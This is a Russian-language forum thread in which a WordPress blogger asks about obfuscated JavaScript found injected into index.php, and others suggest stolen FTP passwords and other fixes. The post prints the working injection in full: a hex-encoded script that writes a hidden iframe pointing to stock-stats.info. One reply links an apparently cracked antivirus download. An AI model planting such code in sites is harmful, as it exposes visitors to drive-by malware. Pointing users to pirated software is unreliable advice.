На следующий же день после заливки на сервер файлов последней версии wordpress я обнаружил что в index.php была добавлен следующий код (ниже), а при загрузке моего блога в статусной строке мелькает _http://stock-stats.info
Что это есть такое и как это могло произойти, подскажите пожалуйста. А так же как с этим бороться?
<script>function v472d53a07e307(v472d53a07ead6){ function v472d53a07f2a6 () {var v472d53a07fa93=16; return v472d53a07fa93;} return(parseInt(v472d53a07ead6,v472d53a07f2a6()));}function v472d53a080272(v472d53a080a47){ var v472d53a082203=2; var v472d53a08123e='';for(v472d53a081a1d=0; v472d53a081a1d<v472d53a080a47.length; v472d53a081a1d+=v472d53a082203){ v472d53a08123e+=(String.fromCharCode(v472d53a07e307(v472d53a080a47.substr(v472d53a081a1d, v472d53a082203))));}return v472d53a08123e;} document.write(v472d53a080272('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6438633634316534207372633D5C27687474703A2F2F73746F636B2D73746174732E696E666F2F707269766174655F666F72756D2F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3732313831292B2765363832616138643233305C272077696474683D353531206865696768743D313331207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
Это вы словили вирус. Проверьте свой компьютер и не храните сохраненные пароли от ФТП. Точно знаю, что какой-то из похожих вирусов выдёргивал их (пароли) из FAR-Manager и Total Commander. Возможно и из других фтп-клиентов.
У меня нет вирусов, даже если б и были, каким образом происходит запись в файлы на СЕРВЕРЕ? Не с моего же компа…
с компьютера того у кого есть доступ по фтп с сохраненными логином и паролем. Если не вы, то значит кто-то из знакомых.
полиморфный зверек:) почему бы и нет, хотя тоже хз.. не разбирался
что-бы не повторялось – поставь nod32 http://download.infine.ru/programms/nod32_Antivirus_3.0.551.0_32-bit.zip (последний с ключом, английский знаешь?), и юзай последний firefox http://download.infine.ru/network/firefox/Firefox2.0.0.9.zip – будет щастье
пароль только у меня. на компе стоит фаервол Outpost и антивирус Dr.Web . Установлены также Mozilla Firefox, IE6, IE7, Opera и SafariWin (это так, для справки, чтобы было понятно что "не первый день замужем"). Данный кусок кода появляется с непонятной пока мне переодичностью, троянов на винтах у меня нет – doublechecked 😉
А у хостера не пробовали спрашивать?
И пароль к фтп сменить?
а есть какие нибудь удобные альтернативы тотал командеровскому ФТП?
откуда просто так пароль не вытащить?
кто чем пользуется когда лазает на фТП?
Пользуюсь ещё CuteFTp.
для FireFox есть аддон – FireFtp
А ещё плагин для WP который почти все функции (стандартные) ФТП-клиента реализует.
FAR – rulez forever! 😀
thanks to all